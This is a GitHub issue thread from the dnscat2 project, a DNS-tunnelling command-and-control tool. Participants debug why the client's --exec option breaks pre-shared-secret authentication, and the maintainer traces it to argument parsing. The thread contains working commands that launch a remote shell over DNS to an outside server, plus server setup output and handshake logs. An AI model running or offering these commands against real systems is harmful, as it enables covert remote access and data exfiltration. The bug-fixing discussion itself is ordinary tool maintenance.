### ISSUE TITLE
Client side --exec seems to break PSK auth

### ISSUE THREAD

**Issue by bmenrigh** [iagox86/dnscat2#83] opened 2015-12-08 23:49 UTC
I'm running a server at ns.brandonenright.net and when I run a client like so it connects and verifies just fine:

    $ ./dnscat --secret=33155a8e3ca44756a88a61ad669afb35 ns.brandonenright.net 
    Creating DNS driver:
     domain = ns.brandonenright.net
     host   = 0.0.0.0
     port   = 53
     type   = TXT,CNAME,MX
     server = 171.70.168.183
    
    ** Peer verified with pre-shared secret!
    
    Session established!

However if I try to exec a shell with the client then verification fails:

    $ ./dnscat -e /bin/bash --secret=33155a8e3ca44756a88a61ad669afb35 ns.brandonenright.net 
    [[ WARNING ]] :: Starting: /bin/sh -c '/bin/bash'
    [[ WARNING ]] :: Started: /bin/bash (pid: 18684)
    Creating DNS driver:
     domain = ns.brandonenright.net
     host   = 0.0.0.0
     port   = 53
     type   = TXT,CNAME,MX
     server = 171.70.168.183
    [[ FATAL ]] :: Received FIN: (reason: 'Session killed: Invalid authenticator (pre-shared secret)') - closing session
    [[ WARNING ]] :: exec driver shut down; killing process 18684
    [[ FATAL ]] :: There are no active sessions left! Goodbye!
    [[ WARNING ]] :: Terminating

**Comment by iagox86** [comment] 2015-12-14 23:56
Hmm, I'm unable to repro.. I run the server with:

$ ruby ./dnscat2.rb --dnsport=53531 --firehose --secret=33155a8e3ca44756a88a61ad669afb35 test.com
    
    New window created: 0
    New window created: crypto-debug
    Welcome to dnscat2! Some documentation may be out of date.
    
    auto_attach => false
    history_size (for new windows) => 1000
    Security policy changed: All connections must be encrypted and authenticated
    New window created: dns1
    Starting Dnscat2 DNS server on 0.0.0.0:53531
    [domains = test.com]...
    
    Assuming you have an authoritative DNS server, you can run
    the client anywhere with the following (--secret is optional):
    
      ./dnscat --secret=33155a8e3ca44756a88a61ad669afb35 test.com
    
    To talk directly to the server without a domain name, run:
    
      ./dnscat --dns server=x.x.x.x,port=53531 --secret=33155a8e3ca44756a88a61ad669afb35
    
    Of course, you have to figure out <server> yourself! Clients
    will connect directly on UDP port 53531.
    
    dnscat2> Received:  40220330380000000033dda9c933aa3942b1c9798e904c373c2ba4d4b36d.38b767056f01b5044ef0c4d5f52f47331ee2b042c81c22bea1cd755f2e51.88607f40f91e5d48d9d7a8926b.test.com (CNAME)
    Creating Encryptor with secret: 33155a8e3ca44756a88a61ad669afb35
    New window created: 1
    history_size (session) => 1000
    Not decrypting data (incoming data seemed to be cleartext): ["40220330380000000033dda9c933aa3942b1c9798e904c373c2ba4d4b36d38b767056f01b5044ef0c4d5f52f47331ee2b042c81c22bea1cd755f2e5188607f40f91e5d48d9d7a8926b"]
    Setting their public key: 33dda9c933aa3942b1c9798e904c373c2ba4d4b36d38b767056f01b5044ef0c4 d5f52f47331ee2b042c81c22bea1cd755f2e5188607f40f91e5d48d9d7a8926b
    Setting my public key: 8e87dcce81d60bbd4d721bf3f8147607b17d882de03bded32efb4c32c8bd0c3d 7f6b4f1003960bb409b07aa71420961301e6778c2ee955eab207fa63862f3c2b
    Returning an unencrypted response
    Sending:  5b31033038000000008e87dcce81d60bbd4d721bf3f8147607b17d882de03bd.ed32efb4c32c8bd0c3d7f6b4f1003960bb409b07aa71420961301e6778c2ee9.55eab207fa63862f3c2b.test.com
    Received:  1b2e033038962021760b650000d68748a1e436dc0aad42ea3c0443d38e4b.e248a8d34e91508cd9223530032a5abc24031b.test.com (CNAME)
    Successfully authenticated the session
    Sending:  d81d033038362dfff13520ffff84f41c1d0d1f0921ce7ecd333447b9dbe122f.42e3a414a14b96cd40782c6ce52ad0b525b.test.com
    Received:  c4880030380a122ba05a6b0001f5bbc5bec97c1c2eefab65fc4caf7c571e.9020e14b17f9453d454a72842bb85a47270ac8c804d7175c31.test.com (CNAME)
    Session 1 Security: ENCRYPTED AND VERIFIED!

And on the client:

    $ make debug && ./dnscat --dns server=127.0.0.1,port=53531,domain=test.com --secret=33155a8e3ca44756a88a61ad669afb35 -d --exec /bin/sh
    *** Debug build complete
    Creating DNS driver:
     domain = test.com
     host   = 0.0.0.0
     port   = 53531
     type   = TXT,CNAME,MX
     server = 127.0.0.1
    [[ INFO ]] :: Setting session->name to /bin/sh
    [[ WARNING ]] :: Starting: /bin/sh -c '/bin/sh'
    [[ WARNING ]] :: Started: /bin/sh (pid: 11916)
    [[ INFO ]] :: Sending DNS query for: 40220330380000000033dda9c933aa3942b1c9798e904c373c2ba4d4b36d.38b767056f01b5044ef0c4d5f52f47331ee2b042c81c22bea1cd755f2e51.88607f40f91e5d48d9d7a8926b.test.com to 127.0.0.1:53531
    [[ INFO ]] :: DNS response received (346 bytes)
    [[ INFO ]] :: Received a CNAME response: 5b31033038000000008e87dcce81d60bbd4d721bf3f8147607b17d882de03bd.ed32efb4c32c8bd0c3d7f6b4f1003960bb409b07aa71420961301e6778c2ee9.55eab207fa63862f3c2b.test.com
    my_private_key: 7ce637e9d940fb7c6063fe75c4cfbb85aec4b34ee2b156a00f37ec4719bfcc3a
    my_public_key: 33dda9c933aa3942b1c9798e904c373c2ba4d4b36d38b767056f01b5044ef0c4d5f52f47331ee2b042c81c22bea1cd755f2e5188607f40f91e5d48d9d7a8926b
    their_public_key: 8e87dcce81d60bbd4d721bf3f8147607b17d882de03bded32efb4c32c8bd0c3d7f6b4f1003960bb409b07aa71420961301e6778c2ee955eab207fa63862f3c2b
    
    shared_secret: 6f80f9a889c70109252eaa7ed46cf3e3227fa30344a3be16f87144d1763d0ea5
    my_authenticator: b1aed27c44b22de56ca0ec0f61c3cdb4583378e4b1e6426e47213ce55e66a00b
    their_authenticator: 2acb1e93bdf5094d4aae2d30f74a37b0af572ded699aa8a57c02367d061432b5
    
    my_write_key: 141bc1a7a3c51c92949a47351de94215ae409ea4a64d0fa1162a8422afb5a255
    my_mac_key: fa2a4f6b59f144845f5cb307544c5cab4f6e6194e360de520fb1d716441ea504
    their_write_key: 7f1b3dd7a56232bc0958204e489b1c1c30ac82664f675d3bbec7e337ec07dd02
    their_mac_key: 645a21e725043805c7bb66752add7c63699560d0daeabd4094429a2301e41e75
    [[ INFO ]] :: Sending DNS query for: 1b2e033038962021760b650000d68748a1e436dc0aad42ea3c0443d38e4b.e248a8d34e91508cd9223530032a5abc24031b.test.com to 127.0.0.1:53531
    [[ INFO ]] :: DNS response received (248 bytes)
    [[ INFO ]] :: Received a CNAME response: d81d033038362dfff13520ffff84f41c1d0d1f0921ce7ecd333447b9dbe122f.42e3a414a14b96cd40782c6ce52ad0b525b.test.com
    
    ** Peer verified with pre-shared secret!

**Comment by iagox86** [comment] 2015-12-15 00:00
Hmm, I set up an environment slightly more like yours, and repro'd. Weird! I'll keep digging. :)

**Comment by iagox86** [comment] 2015-12-15 00:07
Looks like something is going wrong in the parsing:
    Tried to set a bad authenticator
    Expected: ["50149ec5aa460e67e61c51f85141b1bee2b1e46ec69fa9021bffc98f66a5e366"]
    Received: ["0000000000000000000000000000000000000000000000000000000000000000"]

So weird that this only happens for --exec sessions...

**Comment by iagox86** [comment] 2015-12-15 00:12
Ahh, the problem is parsing the arguments in C. If you put "-e /bin/bash" at the end it'll work. :)

**Comment by iagox86** [comment] 2015-12-15 00:26
It should be fixed.

It's not the cleanest solution, though, so I'm going to leave this open for now.

**Closed** 2016-03-09 21:19 UTC

**Comment by slohin-st** [comment] 2017-03-23 18:50
Hello! Wondering if you have experienced this issue at all since. I am trying to run something similar to what Brandon was doing in an training environment and keep running into the "Invalid Authenticator". Some additional details:
1. Everything works fine if I add the Server IP of the attacker, however I would like the victim host to query the DNS servers in between.
2. There are no issues until I try to create the shell.
3. I have tried running with -e.

Thanks! The tool is so great.

**Comment by slohin-st** [comment] 2017-03-23 19:43
Spent some time troubleshooting and the issue seems to be with my DNS infrastructure in the test environment. I started running dnscat2 w/o authentication and was able to open shells, however running commands would cause DNS rcode errors. I would send screenshots but I'm running things on a network w/o internet connection currently. I can pull things if you need me to another time. 

The DNS environment works w/o issues under normal circumstances. Have you encountered any situations where you had trouble running something based on the configuration of the DNS server?
